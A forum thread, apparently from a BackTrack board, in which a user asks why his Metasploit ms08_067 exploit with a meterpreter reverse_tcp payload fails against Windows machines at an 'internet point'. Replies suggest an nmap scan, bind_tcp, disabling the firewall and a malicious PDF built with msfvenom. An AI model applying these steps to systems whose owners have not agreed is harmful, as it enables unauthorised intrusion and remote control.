Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: I do not understand where the mistake

Hybrid View

  1. #1
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Msfconsole i do not understand where the mistake

    I have internet point and I have 4 computers with 1 xp and 3 with win7 so then copy the ip address i get home where i installed backtrack5. The open msfconsole and write "use windows/smb/ms08_067_netapi" "set PAYLOAD windows/meterpreter/reverse_tcp""set lhost my ip""set rhost ip victim"show targets and and choose sp 3 ita" exploit"
    [*] Started reverse handler on 192.168.1.5:4444
    [-] Exploit exception: The connection timed out (ip victim:445).[*] Exploit completed, but no session was created.

    I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
    [*] Exploit completed, but no session was created.
    It would be a very pleasant your help exscuse my english.
    Last edited by Darkcomet; 12-19-2011 at 08:47 PM.

  2. #2
    Member
    Join Date
    May 2011
    Location
    Portugal
    Posts
    84

    Default Re: I do not understand where the mistake

    In what OS are you trying to use that exploit?

    Win7 or the xp? Windows 7 is not vulnerable to that exploit and Windows Xp is not vulnerable with that exploit too when patched with update fix "KB9586644".

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    San Diego, CA
    Posts
    21

    Default Re: Msfconsole i do not understand where the mistake

    Quote Originally Posted by Darkcomet View Post
    I have internet point and I have 4 computers with 1 xp and 3 with win7 so then copy the ip address i get home where i installed backtrack5. The open msfconsole and write "use windows/smb/ms08_067_netapi" "set PAYLOAD windows/meterpreter/reverse_tcp""set lhost my ip""set rhost ip victim"show targets and and choose sp 3 ita" exploit"
    [*] Started reverse handler on 192.168.1.5:4444
    [-] Exploit exception: The connection timed out (ip victim:445).[*] Exploit completed, but no session was created.

    I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
    [*] Exploit completed, but no session was created.
    It would be a very pleasant your help exscuse my english.
    Try using bind_tcp and see if you're able to trigger the payload. Are you sure that port 445 is open? Try running
    Code:
    nmap -A -sS 192.168.1.5
    . If the ports are open it could be the firewall preventing you from establishing a reverse connection.

  4. #4
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: I do not understand where the mistake

    Although not all modules support it, you might try the check command in msfconsole. This will see if your target is vulnerable to that particular exploit.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  5. #5
    Just burned their ISO MI1c00k's Avatar
    Join Date
    Jul 2011
    Location
    Slovakia
    Posts
    9

    Default Re: Msfconsole i do not understand where the mistake

    You should check if that system is patched or not, disable firewall on Win XP and check if your target - service pack + language pack meets Metasploit module. Use "show targets" command to check. If its not there then create one, MS08_067 is a wonderful example why automatic exploitation tools fails against various service pack and various languages packs. Read detailed HDM description:

    cat /opt/framework/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb

    and try build your own target as described in exploit body or here:http://www.hack4fun.eu/2010/05/metas...pi-win-xp-svk/

  6. #6
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Re: I do not understand where the mistake

    XP and the command check not found..I do not know which exploit to use xp or win7 I would like to experiment and I learned something...Someone can help me..

  7. #7
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: I do not understand where the mistake

    Are you fairly new to metasploit, or have you been working with it awhile? If you're a metasploit newbie, you may want to go through the metasploit unleashed tutorial over at Offensive Security--it's a great resource.

    If you've been using MSF for awhile, try the following: install an old version of Adobe Reader on your XP target. Then, using msfvenom, build a poison pdf with an exploit targeting the vulnerable version of Adobe Reader. Run the poison pdf on your target, and see if you get a shell, meterpreter session, or whatever payload you encoded in the pdf.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  8. #8
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Riferimento: I do not understand where the mistake

    The computer central not have win xp but have win7 . . May be the reason? to switch to the computer with XP I must first go from the central computer that has win7?Tell me if you can be the reason?
    Last edited by Darkcomet; 12-24-2011 at 06:26 PM.

  9. #9
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: I do not understand where the mistake

    Not sure what you're saying, but it sounds like you're referring to pivoting (i.e. gaining control of an xp machine first, then going from that to win7). Do you have 2 targets you're trying to exploit (one PC that has xp, and one PC that has Win7)? If so, you may need to try a different exploit...based on what's installed on your target boxes. Metasploit has several exploits available for older versions of Adobe Reader; give one of those a try. You can use a process similar to what I described above.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  10. #10
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Re: I do not understand where the mistake

    Thank you for answer.Let me ask you only this. I have 4 PC 1 xp and 3 with win7. . I think that I can not come with a xp exploit, because the main computer has win7.May be the reason?

Page 1 of 2 12 LastLast

Similar Threads

  1. Deleted file by mistake - /etc/init.d/postgresql-8.4
    By Unhumanje in forum BackTrack 5 Beginners Section
    Replies: 4
    Last Post: 06-21-2011, 01:28 PM
  2. Backtrack 4 vpn - help to understand!
    By catalist in forum Beginners Forum
    Replies: 0
    Last Post: 08-06-2010, 07:02 PM
  3. BT4 USB Modem big mistake
    By guide_shen in forum Beginners Forum
    Replies: 1
    Last Post: 02-17-2010, 09:33 AM
  4. i don't understand how to boot BT3
    By bluelat in forum OLD Newbie Area
    Replies: 12
    Last Post: 12-11-2008, 03:53 AM
  5. typo Mistake in USB Edition
    By imported_rul3z in forum OLD BT3beta Bugs and Fixes
    Replies: 1
    Last Post: 02-28-2008, 09:07 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •